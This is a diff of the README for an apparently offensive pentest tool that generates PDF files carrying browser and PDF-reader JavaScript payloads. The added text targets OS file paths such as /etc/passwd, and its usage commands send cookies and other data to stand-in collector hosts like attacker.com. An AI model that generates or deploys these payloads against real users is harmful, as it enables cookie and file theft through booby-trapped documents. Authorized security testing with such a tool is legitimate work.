designed for legitimate security testing, educational purposes, and authorized penetration testing only. Users are responsible for ensuring they have proper authorization before testing any systems. Unauthorized use is prohibited and may be illegal. @@ -31,6 +43,20 @@ This tool is designed for legitimate security testing, educational purposes, and - **Browser-Optimized PDF Objects**: Different PDF versions and structures per browser - **Enhanced Cross-Reference Tables**: Proper offset calculations and object references - **Font Resources**: Complete font dictionaries to prevent rendering issues +- **Complete Payload Visibility**: Full payload content displayed in PDF for reference +- **Filename Integration**: PDF filename shown as heading for easy identification + +### OS-Aware File System Targeting +- **Windows**: Targets `C:\Windows\System32\`, `C:\Users\`, etc. +- **macOS**: Targets `/Applications/`, `/Users/`, `/System/`, etc. +- **Linux**: Targets `/etc/passwd`, `/home/`, `/usr/bin/`, etc. +- **Android**: Targets `/system/`, `/data/`, Android-specific paths +- **Automatic Detection**: Scripts detect running OS and use appropriate file paths + +### Enhanced Security & Compatibility +- **Parent Object Checks**: All payloads include proper checks for `parent`, `top`, `frames` objects +- **Cross-Browser Compatibility**: Handles different JavaScript contexts safely +- **Error Handling**: Graceful fallbacks when objects are undefined ### Payload Categories - **DOM Access**: Browser DOM manipulation from PDF context @@ -54,6 +80,9 @@ This tool is designed for legitimate security testing, educational purposes, and ### Basic Usage ```bash +# Navigate to the PDF directory +cd PDF + # Generate Chrome-specific payloads python3 script.py -b chrome -u http://attacker.com/collect @@ -69,6 +98,9 @@ python3 script.py -b adobe --count 50 -u http://collector.com ### Advanced Usage ```bash +# Navigate to the PDF directory first +cd PDF + # Export payload database as JSON python3 script.py -b all --output-json @@ -80,6 +112,9 @@ python3 script.py --list-research # Filter by specific categories python3 script.py -b chrome --category command_execution -u http://log.site + +# Use the alternative script for browser-specific PDFs +python3 Another-Script.py -b chrome -u http://test.com ``` ## 🎯 Browser Targets @@ -111,7 +146,7 @@ python3 script.py -b chrome --category command_execution -u http://log.site ### Installation ```bash git clone https://github.com/SNGWN/XSS-PDF.git -cd XSS-PDF +cd XSS-PDF/PDF # Note: Scripts are now in the PDF folder ``` ## 📖 Usage @@ -119,6 +154,9 @@ cd XSS-PDF ### Basic Commands ```bash +# Navigate to the PDF directory +cd PDF + # Show help and available options python3 script.py --help @@ -141,6 +179,9 @@ python3 script.py -o html ### Advanced PDF Sandbox Escape Usage ```bash +# Navigate to PDF directory first +cd PDF + # PDF data exfiltration via form submission escape python3 script.py -t cookie -u http://attacker.com/collect